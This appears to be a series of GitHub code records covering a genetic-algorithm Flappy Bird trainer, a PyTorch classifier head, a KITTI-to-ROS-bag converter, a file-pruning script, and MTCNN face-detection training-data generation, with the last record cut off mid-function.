__init__(self):\n self.population = []\n while len(self.population) < POPULATION_SIZE:\n self.population.append(Bird())\n\n self.hall_of_fame = []\n\n @property\n def _alive(self):\n return list(filter(lambda bird: not bird.dead,\n self.population))\n\n @property\n def _best_bird(self):\n ans = self.population[0]\n for bird in self.population:\n if bird.score > ans.score:\n ans = bird\n return ans\n\n def _tournament(self):\n winner = random.choice(self.population)\n for i in range(TOURNAMENT_SIZE - 1):\n candidate = random.choice(self.population)\n if candidate.score > winner.score:\n winner = candidate\n return winner.copy()\n\n def _update_walls(self):\n if len(self.walls) == 0 or self.walls[-1].x < self._alive[0].x + WINDOW_WIDTH:\n if len(self.walls) == 0:\n x = WINDOW_HEIGHT\n else:\n x = self.walls[-1].x + WINDOW_HEIGHT\n\n self.walls.append(Wall(x, WALL_MIN_Y + random.random() * (WALL_MAX_Y - WALL_MIN_Y)))\n if self.walls[0].x < self._alive[0].x - WINDOW_WIDTH:\n self.walls = self.walls[1:]\n\n def change_population(self):\n self.hall_of_fame.append(self._best_bird)\n self.hall_of_fame = list(sorted(self.hall_of_fame,\n key=lambda bird: bird.score,\n reverse=True))\n self.hall_of_fame = self.hall_of_fame[:HALL_OF_FAME_SIZE]\n\n new_population = []\n while len(new_population) < POPULATION_SIZE - len(self.hall_of_fame):\n new_population.append(self._tournament())\n for bird1, bird2 in zip(new_population[::2], new_population[1::2]):\n bird1.crossover(bird2)\n for bird in new_population:\n bird.mutate()\n\n for bird in self.hall_of_fame:\n new_population.append(bird.copy())\n\n self.population = new_population\n self.walls = []\n\n def simulate_life(self):\n timer = time.time()\n while len(self._alive) > 0:\n canvas.delete('all')\n\n self._update_walls()\n\n delta_time = time.time() - timer\n timer += delta_time\n for bird in self.population:\n if ONLINE:\n bird.move(delta_time)\n else:\n bird.move(1 / FPS)\n\n for bird in self.population:\n for wall in 
self.walls:\n bird.check_strike(wall)\n\n nearest_wall = list(filter(\n lambda wall: wall.x + wall.width / 2 > self.population[0].x - self.population[0].width / 2,\n self.walls))[0]\n\n for bird in self.population:\n bird.jump(nearest_wall)\n\n camera.sync(self.population[0])\n for bird in self._alive:\n bird.draw()\n for wall in self.walls:\n wall.draw()\n\n canvas.create_text(150, 25, text=f'Generation: {generation_number}', font='Calibri 25')\n canvas.create_text(150, 50, text=f'Alive: {len(self._alive)}', font='Calibri 25')\n canvas.create_text(150, 75, text=f'Score: {int(self.get_best_score())}', font='Calibri 25')\n canvas.create_text(150, 100, text=f'Top score: {int(max(top_score, self.get_best_score()))}', font='Calibri 25')\n canvas.update()\n\n def get_best_score(self):\n return self._best_bird.score\n\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n root.title('Floppy Bird')\n canvas = tkinter.Canvas(root, width=WINDOW_WIDTH, height=WINDOW_HEIGHT)\n canvas.pack()\n camera = Camera()\n\n generation = Generation()\n generation_number = 1\n top_score = 0\n while generation_number <= MAX_GENERATIONS:\n print(\"Generation\", generation_number)\n generation.simulate_life()\n top_score = max(top_score, generation.get_best_score())\n generation.change_population()\n generation_number += 1\n","repo_name":"nalek0/flappy-bird-AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"37899724566","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass IndependenceTestModel(nn.Module):\n def __init__(self, config, model_input_dim, hidden_dim):\n super(IndependenceTestModel, self).__init__()\n\n self.config = config\n\n if config[\"feature_type\"] == \"feature\":\n # Model head\n self.classifier = nn.Sequential(\n nn.Linear(model_input_dim, hidden_dim),\n nn.LeakyReLU(),\n nn.Linear(hidden_dim, 2),\n )\n\n else:\n raise AssertionError(\"Unhandled feature type\")\n\n if torch.cuda.is_available():\n self.cuda()\n\n def gen_logits_(self, model_input, type=\"logsoftmax\"):\n \"\"\"\n :param model_input: Pytorch float tensor of size batch x dim\n :return:\n \"\"\"\n\n if self.config[\"feature_type\"] == \"image\":\n raise AssertionError()\n\n logits = self.classifier(model_input)\n\n if type == \"logsoftmax\":\n result = F.log_softmax(logits, dim=1)\n elif type == \"softmax\":\n result = F.softmax(logits, dim=1)\n else:\n raise AssertionError(\"Unhandled type \", type)\n\n return result\n\n def gen_log_prob(self, model_input):\n return self.gen_logits_(model_input, type=\"logsoftmax\")\n\n def gen_prob(self, model_input):\n return self.gen_logits_(model_input, type=\"softmax\")\n","repo_name":"microsoft/Intrepid","sub_path":"src/model/misc/independence_test_model.py","file_name":"independence_test_model.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"94"} +{"seq_id":"7369760557","text":"# to store the IMU/INS measurements as a ROS message\n# for image interpretation and manipulation\n# to read .hdf5 sensor records files\nimport datetime as dt\nimport os\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport rosbag\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Imu\n\n\nclass KittiBagGen:\n def __init__(self, imgDir=None, imuDir=None, output_filename=None):\n \"\"\"\n # :param h5_filename: filename to store 
dataframe as hdf5\n :param imgDir: path to left image directory for sequence\n :param imuDir: path to imu data directory for sequence\n \"\"\"\n # if not h5_filename:\n # raise ValueError(\"Storage filename not provided\")\n # self.h5_filename = str(h5_filename)\n if not output_filename:\n self.of = \"kitti_latest.bag\"\n else:\n self.of = output_filename\n\n if not os.path.isdir(imgDir):\n raise NotADirectoryError\n # check dir contents?\n\n if imuDir and not os.path.isdir(imuDir):\n raise NotADirectoryError\n # check dir contents?\n\n self.imgDir = imgDir\n self.imuDir = imuDir\n\n # self.store = pd.HDFStore('dataset.h5')\n # self.data = pd.DataFrame()\n # self.store[\"data\"] = self.data\n\n self.write_bag()\n\n def write_bag(self):\n img_names = os.listdir(f\"{self.imgDir}/image_0\")\n img_names.sort()\n times = []\n with open(f\"{self.imgDir}/times.txt\") as f:\n times = f.readlines()\n\n if not times:\n raise ValueError('no timestamps extracted')\n\n time_offset = 0.01\n times = [float(i) + time_offset for i in times]\n\n if len(times) != len(img_names):\n raise ValueError('Incompatible timestamp/images list')\n\n # imgs = []\n # for n, name in enumerate(img_names):\n # if n % int(len(img_names) / 10) == 0:\n # print(f\"{n} / {len(img_names)}\")\n # imgs.append(cv2.imread(f\"{self.imgDir}/image_0/{name}\"))\n # self.data.assign(image_0=imgs)\n # del imgs\n\n with rosbag.Bag(self.of, \"w\") as bag:\n\n for i, (t, img_name) in enumerate(zip(times, img_names)):\n if i % int(len(img_names) / 20) == 0:\n print(f\"{2 * i:5d} / {2 * len(img_names):5d} images bagged\")\n image = (\n cv2.imread(f\"{self.imgDir}/image_0/{img_name}\"), cv2.imread(f\"{self.imgDir}/image_1/{img_name}\"))\n # convert from cv2 to ROS\n bridge = (CvBridge(), CvBridge())\n img_msg = (\n bridge[0].cv2_to_imgmsg(image[0], \"passthrough\"), bridge[1].cv2_to_imgmsg(image[1], \"passthrough\"))\n\n # img_msg format:\n # http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/Image.html\n\n # left image\n img_msg[0].header.stamp.secs = int(np.floor(t))\n img_msg[0].header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n img_msg[0].header.seq = i\n # frame source\n img_msg[0].header.frame_id = \"cam0\"\n # definitions for byte handling\n img_msg[0].height = image[0].shape[0]\n img_msg[0].width = image[0].shape[1]\n img_msg[0].step = image[0].shape[1] * image[0].shape[2] # (image width in bytes)\n # encoding\n img_msg[0].encoding = \"bgr8\"\n\n # right image\n img_msg[1].header.stamp.secs = int(np.floor(t))\n img_msg[1].header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n img_msg[1].header.seq = i\n # frame source\n img_msg[1].header.frame_id = \"cam0\"\n # definitions for byte handling\n img_msg[1].height = image[1].shape[0]\n img_msg[1].width = image[1].shape[1]\n img_msg[1].step = image[1].shape[1] * image[1].shape[2] # (image width in bytes)\n # encoding\n img_msg[1].encoding = \"bgr8\"\n\n # write image to the bag file under the 'camera/left/image_raw' topic\n bag.write(\"/cam0/image_raw\", img_msg[0], img_msg[0].header.stamp)\n bag.write(\"/cam1/image_raw\", img_msg[1], img_msg[1].header.stamp)\n\n if self.imuDir:\n imus = os.listdir(f\"{self.imuDir}/data\")\n imus.sort()\n times = []\n with open(f\"{self.imuDir}/times.txt\", \"r\") as f:\n init_time = None\n zero_timedelta = dt.datetime(1900, 1, 1)\n for time in f.readlines():\n time, nanoseconds = time.strip().split('.')\n nanoseconds = float(nanoseconds) / (10 ** 9)\n timedt = dt.datetime.strptime(time, \"%Y-%m-%d %H:%M:%S\")\n time = 
(timedt - zero_timedelta).total_seconds() + nanoseconds\n if not init_time:\n init_time = time\n time = time - init_time + time_offset\n times.append(time)\n\n imu_keys = [\"timestamp\"]\n with open(f\"{self.imuDir}/dataformat.txt\", \"r\") as f:\n line = f.readline()\n while line:\n imu_keys.append(line.strip().split(\":\")[0])\n line = f.readline()\n\n imu_data = []\n for filename, timestamp in zip(imus, times):\n with open(f\"{self.imuDir}/data/{filename}\") as f:\n vals = f.readline().strip().split(' ')\n imu_data.append([timestamp, *[float(i) for i in vals]])\n data = pd.DataFrame(imu_data, columns=imu_keys)\n\n for i in range(data.shape[0]):\n repeat_count = 2\n\n if i % int(data.shape[0] / 10) == 0:\n print(f\"{i * repeat_count:5d} / {data.shape[0] * repeat_count:5d} imu points bagged\")\n\n for j in range(repeat_count):\n imu_msg = Imu()\n\n # imu_msg format:\n # http://docs.ros.org/en/melodic/api/sensor_msgs/html/msg/Imu.html\n\n # ---------- IMU RECORD ---------- #\n # header info\n imu_msg.header.frame_id = \"/imu0\"\n imu_msg.header.seq = i\n t = data.loc[i][\"timestamp\"] + 0.01 * j\n imu_msg.header.stamp.secs = int(np.floor(t))\n imu_msg.header.stamp.nsecs = int(np.round((t - np.floor(t)) * 10 ** 9, 0))\n\n imu_msg.orientation.w = 1.0\n imu_msg.orientation_covariance = [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]\n\n # linear accelerations (m/s^2)\n imu_msg.linear_acceleration.x = data.loc[i][\"ax\"] / float(repeat_count)\n imu_msg.linear_acceleration.y = data.loc[i][\"ay\"] / float(repeat_count)\n imu_msg.linear_acceleration.z = data.loc[i][\"az\"] / float(repeat_count)\n\n # angular rates (rad/s)\n imu_msg.angular_velocity.x = data.loc[i][\"wx\"] / float(repeat_count)\n imu_msg.angular_velocity.y = data.loc[i][\"wy\"] / float(repeat_count)\n imu_msg.angular_velocity.z = data.loc[i][\"wz\"] / float(repeat_count)\n\n # imu_msg.orientation_covariance = [-1 for i in imu_msg.orientation_covariance]\n\n # write the imu_msg to the bag file\n bag.write(\"imu0\", imu_msg, imu_msg.header.stamp)\n\n print(\"Bag closed, process complete\")\n\n\nif __name__ == \"__main__\":\n for seq in range(0, 1):\n kg = KittiBagGen(imgDir=f\"/home/dom-ubuntu/Documents/fyp/datasets/kitti/data_odometry_gray/dataset/sequences/{seq:02d}\",\n imuDir=f\"/home/dom-ubuntu/Documents/fyp/datasets/kitti/data_odometry_imu/dataset/sequences/{seq:02d}\",\n output_filename=f\"/home/dom-ubuntu/Documents/kitti_{seq:02d}.bag\")\n","repo_name":"domRG/rosbag_tools","sub_path":"bag_kitti.py","file_name":"bag_kitti.py","file_ext":"py","file_size_in_byte":8326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30202701191","text":"\nf = open('Data/similarLengthFiles.txt', 'r')\nfLines = f.readlines()\nf.close()\n\nsimilarityThresh = 90\nrelevantFiles = set()\nblackList = set()\n\nfor line in fLines:\n line = line.rstrip('\\n')\n files = line.split('\\t')\n \n fileData0 = files[0].split(' ')\n fileName0 = fileData0[0]\n filePercent0 = int(fileData0[1][1:-2])\n\n fileData1 = files[1].split(' ')\n fileName1 = fileData1[0]\n filePercent1 = int(fileData1[1][1:-2])\n\n print(f'{fileName0} {filePercent0} {fileName1} {filePercent1}')\n\n # check if either file is in the black list first\n if fileName0 in blackList:\n relevantFiles.add(fileName1)\n elif fileName1 in blackList:\n relevantFiles.add(fileName0)\n else:\n # first check if either files are above the similarity threshold\n if (filePercent0 > similarityThresh) or (filePercent1 > similarityThresh):\n \n \n \n # 
save the file name with the lower percentage\n if filePercent0 > filePercent1:\n relevantFiles.add(fileName1)\n\n # blacklist the other file\n blackList.add(fileName0)\n print(f'{fileName1} added')\n else:\n relevantFiles.add(fileName0)\n print(f'{fileName0} added')\n # black list the other file\n blackList.add(fileName1)\n\n else:\n # save both the file names\n relevantFiles.add(fileName1)\n relevantFiles.add(fileName0)\n print(f'both {fileName0} {fileName1}')\n\nprint(len(relevantFiles))\n\nfOut = open('testing.txt', 'w')\nfor name in relevantFiles:\n fOut.write(name)\n fOut.write('\\n')\n\nfOut.close()","repo_name":"rahulAgrBej/searchRepos_CS_Ed","sub_path":"similarLengthPrune.py","file_name":"similarLengthPrune.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71251615030","text":"import sys\nimport numpy as np\nimport cv2\nimport os\nfrom utils.tool import IoU,convert_to_square\nimport numpy.random as npr\nimport argparse\nfrom utils.detect import MtcnnDetector, create_mtcnn_net\nfrom utils.dataloader import ImageDB,TestImageLoader\nimport time\nfrom six.moves import cPickle\nimport utils.config as config\nimport utils.vision as vision\nsys.path.append(os.getcwd())\n\n\ntxt_from_path = './data_set/wider_face_train_bbx_gt.txt'\nanno_file = os.path.join(config.ANNO_STORE_DIR, 'anno_train.txt')\n# anno_file = './anno_store/anno_train.txt'\n\nprefix = ''\nuse_cuda = True\nim_dir = \"./data_set/face_detection/WIDER_train/images/\"\ntraindata_store = './data_set/train/'\nprefix_path = \"./data_set/face_detection/WIDER_train/images/\"\nannotation_file = './anno_store/anno_train.txt'\nprefix_path_lm = ''\nannotation_file_lm = \"./data_set/face_landmark/CNN_FacePoint/train/trainImageList.txt\"\n# ----------------------------------------------------other----------------------------------------------\npos_save_dir = \"./data_set/train/12/positive\"\npart_save_dir = \"./data_set/train/12/part\"\nneg_save_dir = './data_set/train/12/negative'\npnet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_12.txt')\npnet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_12.txt')\npnet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_12.txt')\nimglist_filename_pnet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_12.txt')\n# ----------------------------------------------------PNet----------------------------------------------\nrnet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_24.txt')\nrnet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_24.txt')\nrnet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_24.txt')\nrnet_landmark_file = os.path.join(config.ANNO_STORE_DIR, 'landmark_24.txt')\nimglist_filename_rnet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_24.txt')\n# ----------------------------------------------------RNet----------------------------------------------\nonet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_48.txt')\nonet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_48.txt')\nonet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_48.txt')\nonet_landmark_file = os.path.join(config.ANNO_STORE_DIR, 'landmark_48.txt')\nimglist_filename_onet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_48.txt')\n# ----------------------------------------------------ONet----------------------------------------------\n\n\n\ndef assemble_data(output_file, anno_file_list=[]):\n\n #assemble the pos, neg, part annotations to one file\n size = 12\n\n if 
len(anno_file_list)==0:\n return 0\n\n if os.path.exists(output_file):\n os.remove(output_file)\n\n for anno_file in anno_file_list:\n with open(anno_file, 'r') as f:\n print(anno_file)\n anno_lines = f.readlines()\n\n base_num = 250000\n\n if len(anno_lines) > base_num * 3:\n idx_keep = npr.choice(len(anno_lines), size=base_num * 3, replace=True)\n elif len(anno_lines) > 100000:\n idx_keep = npr.choice(len(anno_lines), size=len(anno_lines), replace=True)\n else:\n idx_keep = np.arange(len(anno_lines))\n np.random.shuffle(idx_keep)\n chose_count = 0\n with open(output_file, 'a+') as f:\n for idx in idx_keep:\n # write lables of pos, neg, part images\n f.write(anno_lines[idx])\n chose_count+=1\n\n return chose_count\ndef wider_face(txt_from_path, txt_to_path):\n line_from_count = 0\n with open(txt_from_path, 'r') as f:\n annotations = f.readlines()\n with open(txt_to_path, 'w+') as f:\n while line_from_count < len(annotations):\n if annotations[line_from_count][2]=='-':\n img_name = annotations[line_from_count][:-1]\n line_from_count += 1 # change line to read the number\n bbox_count = int(annotations[line_from_count]) # num of bboxes\n line_from_count += 1 # change line to read the posession\n for _ in range(bbox_count):\n bbox = list(map(int,annotations[line_from_count].split()[:4])) # give a loop to append all the boxes\n bbox = [bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]] # make x1, y1, w, h --> x1, y1, x2, y2\n bbox = list(map(str,bbox))\n img_name += (' '+' '.join(bbox))\n line_from_count+=1\n f.write(img_name +'\\n')\n else: # dectect the file name\n line_from_count+=1 \n\n# ----------------------------------------------------origin----------------------------------------------\ndef get_Pnet_data():\n if not os.path.exists(pos_save_dir):\n os.makedirs(pos_save_dir)\n if not os.path.exists(part_save_dir):\n os.makedirs(part_save_dir)\n if not os.path.exists(neg_save_dir):\n os.makedirs(neg_save_dir)\n f1 = open(os.path.join('./anno_store', 'pos_12.txt'), 'w')\n f2 = open(os.path.join('./anno_store', 'neg_12.txt'), 'w')\n f3 = open(os.path.join('./anno_store', 'part_12.txt'), 'w')\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n num = len(annotations)\n print(\"%d pics in total\" % num)\n p_idx = 0 # positive\n n_idx = 0 # negative\n d_idx = 0 # dont care\n idx = 0\n box_idx = 0\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n # annotation[0]文件名\n im_path = os.path.join(im_dir, annotation[0])\n # print(im_path)\n # print(os.path.exists(im_path))\n bbox = list(map(float, annotation[1:]))\n # annotation[1:]人脸坐标,一张脸4个值,对应两个点的坐标\n boxes = np.array(bbox, dtype=np.int32).reshape(-1, 4)\n # -1处的值为人脸数目\n if boxes.shape[0]==0:\n continue\n # 若无人脸则跳过本次循环\n img = cv2.imread(im_path)\n # print(img.shape)\n # exit()\n # 计数\n idx += 1\n if idx % 100 == 0:\n print(\"%s images done, pos: %s part: %s neg: %s\" % (idx, p_idx, d_idx, n_idx))\n\n # 图片三通道\n height, width, channel = img.shape\n\n neg_num = 0\n\n # 取50次不同的框\n while neg_num < 50:\n size = np.random.randint(12, min(width, height) / 2)\n nx = np.random.randint(0, width - size)\n ny = np.random.randint(0, height - size)\n crop_box = np.array([nx, ny, nx + size, ny + size])\n\n Iou = IoU(crop_box, boxes) # IoU为 重合部分 / 两框之和 ,越大越好\n\n cropped_im = img[ny: ny + size, nx: nx + size, :] # 裁去多余部分并resize成 12*12\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, 
\"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n neg_num += 1\n\n for box in boxes:\n # box (x_left, y_top, x_right, y_bottom)\n x1, y1, x2, y2 = box\n # w = x2 - x1 + 1\n # h = y2 - y1 + 1\n w = x2 - x1 + 1\n h = y2 - y1 + 1\n\n # ignore small faces\n # in case the ground truth boxes of small faces are not accurate\n if max(w, h) < 40 or x1 < 0 or y1 < 0:\n continue\n if w < 12 or h < 12:\n continue\n\n # generate negative examples that have overlap with gt\n for i in range(5):\n size = np.random.randint(12, min(width, height) / 2)\n\n # delta_x and delta_y are offsets of (x1, y1)\n delta_x = np.random.randint(max(-size, -x1), w)\n delta_y = np.random.randint(max(-size, -y1), h)\n nx1 = max(0, x1 + delta_x)\n ny1 = max(0, y1 + delta_y)\n\n if nx1 + size > width or ny1 + size > height:\n continue\n crop_box = np.array([nx1, ny1, nx1 + size, ny1 + size])\n Iou = IoU(crop_box, boxes)\n\n cropped_im = img[ny1: ny1 + size, nx1: nx1 + size, :]\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n\n # generate positive examples and part faces\n for i in range(20):\n size = np.random.randint(int(min(w, h) * 0.8), np.ceil(1.25 * max(w, h)))\n\n # delta here is the offset of box center\n delta_x = np.random.randint(-w * 0.2, w * 0.2)\n delta_y = np.random.randint(-h * 0.2, h * 0.2)\n\n nx1 = max(x1 + w / 2 + delta_x - size / 2, 0)\n ny1 = max(y1 + h / 2 + delta_y - size / 2, 0)\n nx2 = nx1 + size\n ny2 = ny1 + size\n\n if nx2 > width or ny2 > height:\n continue\n crop_box = np.array([nx1, ny1, nx2, ny2])\n\n offset_x1 = (x1 - nx1) / float(size)\n offset_y1 = (y1 - ny1) / float(size)\n offset_x2 = (x2 - nx2) / float(size)\n offset_y2 = (y2 - ny2) / float(size)\n\n cropped_im = img[int(ny1): int(ny2), int(nx1): int(nx2), :]\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n box_ = box.reshape(1, -1)\n if IoU(crop_box, box_) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n elif IoU(crop_box, box_) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n box_idx += 1\n #print(\"%s images done, pos: %s part: %s neg: %s\" % (idx, p_idx, d_idx, n_idx))\n\n f1.close()\n f2.close()\n f3.close()\n\n\ndef assembel_Pnet_data():\n anno_list = []\n\n anno_list.append(pnet_postive_file)\n anno_list.append(pnet_part_file)\n anno_list.append(pnet_neg_file)\n # anno_list.append(pnet_landmark_file)\n chose_count = assemble_data(imglist_filename_pnet ,anno_list)\n print(\"PNet train annotation result file path:%s\" % imglist_filename_pnet)\n\n# -----------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef gen_rnet_data(data_dir, anno_file, pnet_model_file, prefix_path='', use_cuda=True, vis=False):\n\n \"\"\"\n :param data_dir: train data\n :param anno_file:\n :param pnet_model_file:\n :param prefix_path:\n :param use_cuda:\n :param vis:\n :return:\n \"\"\"\n\n # load trained pnet 
model\n \n pnet, _, _ = create_mtcnn_net(p_model_path = pnet_model_file, use_cuda = use_cuda)\n mtcnn_detector = MtcnnDetector(pnet = pnet, min_face_size = 12)\n\n # load original_anno_file, length = 12880\n imagedb = ImageDB(anno_file, mode = \"test\", prefix_path = prefix_path)\n imdb = imagedb.load_imdb()\n image_reader = TestImageLoader(imdb, 1, False)\n \n all_boxes = list()\n batch_idx = 0\n\n print('size:%d' %image_reader.size)\n for databatch in image_reader:\n if batch_idx % 100 == 0:\n print (\"%d images done\" % batch_idx)\n im = databatch\n t = time.time()\n\n # obtain boxes and aligned boxes\n boxes, boxes_align = mtcnn_detector.detect_pnet(im=im)\n if boxes_align is None:\n all_boxes.append(np.array([]))\n batch_idx += 1\n continue\n if vis:\n rgb_im = cv2.cvtColor(np.asarray(im), cv2.COLOR_BGR2RGB)\n vision.vis_two(rgb_im, boxes, boxes_align)\n\n t1 = time.time() - t\n print('cost time ',t1)\n t = time.time()\n all_boxes.append(boxes_align)\n batch_idx += 1\n # if batch_idx == 100:\n # break\n # print(\"shape of all boxes {0}\".format(all_boxes))\n # time.sleep(5)\n\n # save_path = model_store_path()\n # './model_store'\n save_path = './model_store'\n\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n save_file = os.path.join(save_path, \"detections_%d.pkl\" % int(time.time()))\n with open(save_file, 'wb') as f:\n cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL)\n\n # save_file = './model_store/detections_1588751332.pkl'\n gen_rnet_sample_data(data_dir, anno_file, save_file, prefix_path)\n\n\n\ndef gen_rnet_sample_data(data_dir, anno_file, det_boxs_file, prefix_path):\n\n \"\"\"\n :param data_dir:\n :param anno_file: original annotations file of wider face data\n :param det_boxs_file: detection boxes file\n :param prefix_path:\n :return:\n \"\"\"\n\n neg_save_dir = os.path.join(data_dir, \"24/negative\")\n pos_save_dir = os.path.join(data_dir, \"24/positive\")\n part_save_dir = os.path.join(data_dir, \"24/part\")\n\n\n for dir_path in [neg_save_dir, pos_save_dir, part_save_dir]:\n # print(dir_path)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\n # load ground truth from annotation file\n # format of each line: image/path [x1,y1,x2,y2] for each gt_box in this image\n\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n\n image_size = 24\n net = \"rnet\"\n\n im_idx_list = list()\n gt_boxes_list = list()\n num_of_images = len(annotations)\n print (\"processing %d images in total\" % num_of_images)\n\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n im_idx = os.path.join(prefix_path, annotation[0])\n # im_idx = annotation[0]\n\n boxes = list(map(float, annotation[1:]))\n boxes = np.array(boxes, dtype=np.float32).reshape(-1, 4)\n im_idx_list.append(im_idx)\n gt_boxes_list.append(boxes)\n\n\n # './anno_store'\n save_path = './anno_store'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n f1 = open(os.path.join(save_path, 'pos_%d.txt' % image_size), 'w')\n f2 = open(os.path.join(save_path, 'neg_%d.txt' % image_size), 'w')\n f3 = open(os.path.join(save_path, 'part_%d.txt' % image_size), 'w')\n\n # print(det_boxs_file)\n det_handle = open(det_boxs_file, 'rb')\n\n det_boxes = cPickle.load(det_handle)\n\n # an image contain many boxes stored in an array\n print(len(det_boxes), num_of_images)\n # assert len(det_boxes) == num_of_images, \"incorrect detections or ground truths\"\n\n # index of neg, pos and part face, used as their image names\n n_idx = 0\n p_idx = 0\n d_idx = 0\n image_done = 0\n for 
im_idx, dets, gts in zip(im_idx_list, det_boxes, gt_boxes_list):\n\n # if (im_idx+1) == 100:\n # break\n\n gts = np.array(gts, dtype=np.float32).reshape(-1, 4)\n if gts.shape[0]==0:\n continue\n if image_done % 100 == 0:\n print(\"%d images done\" % image_done)\n image_done += 1\n\n if dets.shape[0] == 0:\n continue\n img = cv2.imread(im_idx)\n # change to square\n dets = convert_to_square(dets)\n dets[:, 0:4] = np.round(dets[:, 0:4])\n neg_num = 0\n for box in dets:\n x_left, y_top, x_right, y_bottom, _ = box.astype(int)\n width = x_right - x_left + 1\n height = y_bottom - y_top + 1\n\n # ignore box that is too small or beyond image border\n if width < 20 or x_left < 0 or y_top < 0 or x_right > img.shape[1] - 1 or y_bottom > img.shape[0] - 1:\n continue\n\n # compute intersection over union(IoU) between current box and all gt boxes\n Iou = IoU(box, gts)\n cropped_im = img[y_top:y_bottom + 1, x_left:x_right + 1, :]\n resized_im = cv2.resize(cropped_im, (image_size, image_size),\n interpolation=cv2.INTER_LINEAR)\n\n # save negative images and write label\n # Iou with all gts must below 0.3\n if np.max(Iou) < 0.3 and neg_num < 60:\n # save the examples\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n # print(save_file)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n neg_num += 1\n else:\n # find gt_box with the highest iou\n idx = np.argmax(Iou)\n assigned_gt = gts[idx]\n x1, y1, x2, y2 = assigned_gt\n\n # compute bbox reg label\n offset_x1 = (x1 - x_left) / float(width)\n offset_y1 = (y1 - y_top) / float(height)\n offset_x2 = (x2 - x_right) / float(width)\n offset_y2 = (y2 - y_bottom) / float(height)\n\n # save positive and part-face images and write labels\n if np.max(Iou) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n\n elif np.max(Iou) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n f1.close()\n f2.close()\n f3.close()\n\ndef model_store_path():\n return os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))+\"/model_store\"\n\ndef get_Rnet_data(pnet_model):\n gen_rnet_data(traindata_store, annotation_file, pnet_model_file = pnet_model, prefix_path = prefix_path, use_cuda = True)\n\n\ndef assembel_Rnet_data():\n anno_list = []\n\n anno_list.append(rnet_postive_file)\n anno_list.append(rnet_part_file)\n anno_list.append(rnet_neg_file)\n # anno_list.append(pnet_landmark_file)\n\n chose_count = assemble_data(imglist_filename_rnet ,anno_list)\n print(\"RNet train annotation result file path:%s\" % imglist_filename_rnet)\n#-----------------------------------------------------------------------------------------------------------------------------------------------#\ndef gen_onet_data(data_dir, anno_file, pnet_model_file, rnet_model_file, prefix_path='', use_cuda=True, vis=False):\n\n\n pnet, rnet, _ = 